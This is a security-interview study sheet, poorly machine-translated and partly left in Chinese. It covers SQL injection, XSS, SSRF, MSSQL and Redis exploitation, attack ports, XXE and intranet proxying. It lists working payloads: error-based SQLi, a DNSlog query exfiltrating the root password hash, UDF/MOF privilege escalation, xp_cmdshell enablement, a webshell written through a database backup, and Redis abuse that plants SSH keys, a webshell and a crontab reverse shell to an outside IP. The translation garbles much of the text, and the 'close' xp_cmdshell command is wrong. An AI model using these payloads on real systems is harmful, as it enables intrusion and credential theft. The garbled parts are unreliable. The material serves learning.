This is what I asked in the interview some problems, mainly tend to basics, if wrong, correct me hope also.
1. sql injection
1. Principle
An attacker by constructing a malicious SQL statements, so that the background database to resolve, so as to achieve the target network intrusion, access to sensitive information
2. sql injection classification
- Divided into the following categories:
- Numeric
- Character
- Subdivision, then it can be divided into:
- Joint inquiry injection
- Multi-statement queries injection
- Error injection
- Boolean injection
- Based on the time delay injection
- Byte wide injection
- and many more
3. Use
- Divided into the following three categories:
- Query data
- Reading and Writing Files
- Excuting an order
4. The error function can be used to inject
- Using floor () function
mysql> select * from users where id = 1 and (select 1 from (select count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)b);
- 1
- The updatexml using () function
mysql> select * from users where id = 1 and updatexml(1,concat(0x7e,database(),0x7e),1);
- 1
- Using extractValue () function
mysql> select * from users where id = 1 and extractvalue(1,concat(0x7e,database(),0x7e));
- 1
ps: If concat is filtered, the function may be implemented using make_set
mysql> select * from users where id = 1 and updatexml(1,make_set(3,0x7e,database()),1);
mysql> select * from users where id = 1 and extractvalue(1,make_set(3,0x7e,database()));
- 1
- 2
- Using join () function
mysql> select * from(select * from users a join users b)c;
- 1
- The geometrical function
e.g. geometrycollection (), multipoint (), polygon (), multipolygon (), linestring (), multilinestring ()
and geometrycollection((select * from(select * from(select user())a)b));
- 1
- Using exp () function
select exp(~(select*from(select database())x));
- 1
The error function which limits required injection
- floor () function
need to satisfy the floor (rand (0) * 2 ), count (*), group by three functions- The updatexml () and extractValue () function
mysql5.1.5, up to 32-bit burst - exp () function
in MySQL version 5.5.5 or greater of the time to the user
- The updatexml () and extractValue () function
6. sql injection read and write files
- load_file()
- And must have permission to read the file must be perfectly readable.
and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/ and (select count(*) from mysql.user)>0 /*返回错误,应该是管理员给数据库账户降权了*/ 高版本的MYSQL添加了一个新的特性secure_file_priv- 1
- 2
- 3
- To read the file must be on the server
- You must specify the full path to the file
- To read the file must be less than max_allowed_packet
- into outfile () and dumpfile INTO ()
INTO outfile export record per line, will add a new line at the end of each line, will escape line breaks, binary files will be destroyed; but dumpfile () to export a complete executable binary file
7. sql defense
- Filter parameters
- Pre-compilation process
- ODBC
- PDO
8. The pre-compiler process explain sql
- Execute precompiled statement
- Set the variable
- Execute the statement
First implementation of the sql statement, then the parameters passed, even if the parameters sql command will not be executed
9. sql bypass filter
- Filtering space
- Instead of double spaces
- With the comment symbol / ** / instead of
- Instead of using the Tab
- Instead of using% a0
- Instead of brackets
- Filter equal sign
- Replaced with like
- Instead of using in
- With <or> instead of
- Filter quotes
- Content with quotes quotes hexadecimal
- Filter angle brackets
- With between function
- With the greatest function
- Function with leatest
- Filter Comma
- Instead of using from for
- Instead of using limit offset
- Replaced by the join
- Replaced with like
- Filtration or, and
- and=&&
- or=||
- Filtration comment symbol
- id=1’union select 1,2,3||'1
- id=1’union select 1,2,'3
- ; 00% cut
- Filter symbol
- Take coding
10. DNSlog limit injection
It must be a Windows system, load_file function used
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 0,1),'.b182oj.ceye.io\\abc’));
- 1
11. MySQL privilege escalation
-
udf mention the right
- udf concept
UDF (User Defined Function) is a server function code MYSQL expansion. - Applications
- Target host system is Windows.
- The host has a mysql user account in the account the need for insert and delete permissions on the mysql.
- Precautions
- mysql version greater than or equal to 5.1 udf.dll need to import directory plugin_dir
- mysql version 5.1 udf.dll small and need to be imported into the C: \ windows \ directory
- Create a performance function using sql statement
create function shell returns string soname 'udf.dll'- 1
- udf concept
-
mof mention the right
- The concept mof
mof is a windows system file (in c: /windows/system32/wbem/mof/nullevt.mof) - step
- The mof uploaded to any directory readable and writable, if spread to D: \ WAMP named \ is the: test.mof. That is: D: \ wamp \ test.mof
- Then use sql statement among the system default nullevt.mof to replace. Let us turn this system performs malicious mof file.
- Alternatively sql statement: select load_file ( 'D: \ wamp \ test.mof') into dumpfile 'c: /windows/system32/wbem/mof/nullevt.mof';
- The concept mof
2. XSS attack
1. XSS Category
- Reflective XSS
- Storage-type XSS
- DOM XSS type
2. They differ
- Reflective XSS and storage type XSS vulnerabilities are server-side code
- Content storage type XSS on the server will store incoming
- DOM XSS is a type of front-end code vulnerabilities
3. XSS hazard
- Steal user Cookie
- Pop-up ads
- Phishing
4. XSS filter
- Treats mixed case
- Multinest
- Byte wide bypassed
5. XSS generally what label is used
1. <javascript>
2. <iframe src=http://xxxx.xx>
3. <img src=javascript:alert('xss')>
4. <body οnlοad=alert('xss')>
5. <body background=javascript:alert('xss')>
6. <input type="image" src="javascript:alert('xss')">
7. ...
- 1
- 2
- 3
- 4
- 5
- 6
- 7
6. XSS effective means of bypassing
- href attribute pseudo-protocol
<a href=javascript:alert('/a/')>adas</a>
- 1
- The use of new HTML5 tags
<math>标签
<embed>标签
- 1
- 2
- Use DataUrl agreement, refer to resources outside the domain
7. What XSS environment
- In the case of the HTML output XSS
- XSS output in the case of HTML attributes
- XSS output in the case of the script tag
- XSS in input value in the case of
- In the case of a textarea output XSS
- Where the innerHTML output XSS
- XSS executed by case eval
- XSS Flash
- …
8. Protection
- + Substance coding filter
used htmlspecialchars () function is encoded - Set httponly
3. request forgery vulnerability and protection
1. CSRF protection scheme
- Add verification process
- Add code
- Verify referer
- Use token
2. SSRF attack effect can be achieved
- Internal web application features network discovery
- The server within the network where the information for various probe
- Read local files using the file protocol
- Hide attack launched attacks against address specific target
3. SSRF common technique bypassed
- Using the @ symbol
- Use localhost
- Use short address
- The use of special domain name
如 10.0.0.1.Xip.io = 10.0.0.1
- 1
- Use DNS resolution
- 利用Enclosed alphanumerics
- Use.
- Using the hexadecimal conversion
127.0.0.1 = 2130706433D = 7F000001
- 1
- Other agreements
- dict://
dict://<user-auth>@<host>:<port>/d:<word>
- 1
- SFTP://
ssrf.php?url=sftp://example.com:11111/
- 1
- TFTP://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
- 1
- LDAP://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
- 1
- Gopher://
- file://
4. penetration tool
1. sqlmap
- -Os-shell resolve
with a function to write into outfile upload page, perform three conditions:- A site must be root privileges
- The absolute path to the attacker's Web site needs to be done
- GPC is off, php active escaping off function
2. brupsuite
- Intruder module - brute force
- Modules
- For more information Target used to configure the target server attacks
- Positions and set the insertion point Payloads type of attack (attack mode)
- Payloads set payload, the configuration dictionary
- Opetions
- Attack mode
- sniper
variable sequentially blasting, a plurality of marks successively - battering ram
to break variables simultaneously, multiple markers simultaneously - pitchfork
each variable marker corresponding to a dictionary, the dictionary corresponding to each item taking - cluster bomb
each variable in a dictionary, and carry out the intersection break, try a variety of combinations for a username + password cracking
- sniper
5. Middleware
1. MSSQL use
- MSSQL differential backup
- Full backup once:
backup database 库名 to disk = 'c:\aa.bak';--
- 1
- create:
create table [dbo].[dtest] ([cmd] [image]);-- insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
- 1
- Differential backup:
backup database test to disk='c:\aa.bak' WITH DIFFERENTIAL,FORMAT;--
- 1
- MSSQL-xp_cmdshell use
- open:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
- 1
- exec:
exec master..xp_cmdshell 'whoami'
- 1
- close:
EXEC sp_configure 'show advanced options', 0;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
- 1
- MSSQL job
2. redis utilization
- Unauthorized written SSH public
use Redis itself provided config command can be written to a file operation, an attacker can successfully authotrized_keys file /root/.ssh own public key file will be written in the target server's folder, and then you can log in directly to the destination server using the corresponding private key.
- Production of public and private key files locally
$ssh-keygen –t rsa
- 1
- The public key file and then write foo.txt
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
- 1
- Then connect Redis to write files
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- Unauthorized write WebShell
config set dir /home/wwwroot/default/
config set dbfilename redis.php
set webshell "<?php phpinfo(); ?>”
save
- 1
- 2
- 3
- 4
- Unauthorized written Crontab Scheduled Tasks
# redis-cli -h 192.168.1.20
192.168.1.20:6379>CONFIG SET dir /var/spool/cron
OK
192.168.1.20:6379>CONFIG SET dbfilename root
OK
192.168.1.20:6379>set payload "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.160/9999 0>&1\n\n"
OK
192.168.1.20:6379>save
OK
192.168.1.20:6379>exit
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
6. Common port
| port | service | Explanation |
|---|---|---|
| 21 | FTP | Mainly to see whether to support anonymous, can also be run weak passwords |
| 22 | SSH | Weak passwords blasting |
| 23 | Telnet | Weak passwords blasting |
| 80-90 | Web | Common Web vulnerabilities as well as some management background |
| 135 | RPC | Call remote code execution |
| 137 | NetBIOS | Obtain information about the target computer |
| 161 | Snmp | public weak passwords |
| 389 | idap | Whether anonymous access |
| 443 | Openssl | Bleeding heart and some Web vulnerability testing |
| 445 | Smb | Run weak password, and the like to detect whether there is an overflow ms_08067 |
| 873 | Rsync | Whether anonymous access, you can also run weak passwords |
| 1025 | Listen port | Get Windows network server information and user information |
| 1099 | Java rmi | Remote Command Execution Vulnerability |
| 1433 | Mssql | Weak passwords blasting |
| 1521 | Oracle | Weak passwords blasting |
| 2082/2083 | Cpanel host management system login | Weak passwords blasting |
| 2222 | DA virtual host management system login | The default password zebra |
| 2601/2604 | zebra router | Explanation |
| 3128 | Squid Proxy default port | If you do not set a password on the network is likely to roam within direct |
| 3306 | Mysql | Weak passwords blasting |
| 3312/3311 | Kangle host management system landing | Explanation |
| 3389 | RDP | Weak passwords blasting, SHIFT back door, magnifying glass, input holes |
| 4440 | Rundeck | Web |
| 4848 | GlassFish | Web middleware weak password admin / adminadmin |
| 5432 | Postgres | Weak passwords blasting |
| 5560/7778 | iSqlPlus | |
| 5900/5901/5902 | Vnc | Weak passwords blasting |
| 6379 | Redis | Usually no verification, direct access |
| 7001/7002 | Weblogic | Weak passwords blasting |
| 7778 | Kloxo hosting control panel login | |
| 8080 | Tomcat/Jboss | 弱口令爆破,jboss后台可能不验证 |
| 8649 | Ganglia | |
| 8080-8090 | 常见WEB端口 | |
| 8888 | Amh/LuManager 主机管理系统默认端口 | 说明 |
| 9000 | Fcgi | fcgi php命令执行漏洞 |
| 9200 | Elasticsearch | 代码执行 |
| 9043 | Websphere | 弱口令爆破 |
| 10000 | Virtualmin/Webmin 服务器虚拟主机管理系统 | |
| 11211 | Memcache | 内存泄露 |
| 27017/28017 | Mongodb | 未授权访问 |
| 50060/50030 | Hadoop | WEB |
7. XXE
1. XXE介绍
XXE全称XML外部实体注入(XML External Entity)形成的原因大都是由于允许引用外部实体。
2. XXE危害
- 读取任意文件
- 执行系统命令
- 探测内网端口
- 攻击内网网站
- …
3. 调用
- 通过&来调用实体值
- 外部调用在实体后面加SYSTEM
- 如果实体前加了%,那么调用实体时也需要使用%
8. 内网基础
1. 端口转发及代理类
- pipe:windows下面的端口转发软件,比较老牌的工具,使用场景有限。
- sockscap:老牌的socks代理工具,主要针对windows平台的端口转发和代理转发。
- proxifier:跨平台的端口转发和代理工具,适用windows,linux,Macos平台,代理转发利器
- Rsscoks:linux平台下的端口转发和代理工具,配合proxychains好用到不行。
- Proxychains:linux平台下老牌的socks代理工具,一般的系统都会自带,谁用谁知道。
- ssh proxy:通过ssh做端口代理和转发,一般linux系统都自带。
- netcat:socat,hping,在很多情况下可以做端口转发和数据代理转发。
- metasploit:metasploit的后渗透模块中有不少代理模块和端口转发模块。
2. 正向代理和反向代理
-
正向代理
就是client连上server,然后把server能访问的机器地址和端口(当然也包括server自己)镜像到client的端口上。 -
反向代理
就是client连上server,然后把client能访问的机器地址和端口(也包括client自己)镜像到server的端口上。 -
用ssh做socks代理
ssh -D [本地IP或省略]:[本地端口] [登陆服务器的用户名@服务器IP] -p [服务器ssh服务端口(默认22)] -
区别
- 位置不同
正向代理,架设在客户机和目标主机之间;
反向代理,架设在服务器端; - 代理对象不同
正向代理,代理客户端,服务端不知道实际发起请求的客户端;
反向代理,代理服务端,客户端不知道实际提供服务的服务端;
</div>
